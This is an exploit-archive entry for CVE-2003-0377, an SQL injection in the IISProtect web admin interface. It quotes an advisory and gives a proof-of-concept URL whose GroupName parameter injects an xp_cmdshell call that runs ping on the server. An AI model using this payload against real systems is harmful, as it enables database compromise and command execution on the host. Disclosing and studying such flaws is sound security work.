IISProtect 2.1/2.2 Web Administration Interface SQL Injection Vulnerability. CVE-2003-0377. Webapps exploit for asp platform
source: http://www.securityfocus.com/bid/7675/info The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect. Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences. http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste r..xp_cmdshell'ping%2010.10.10.11';-- This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.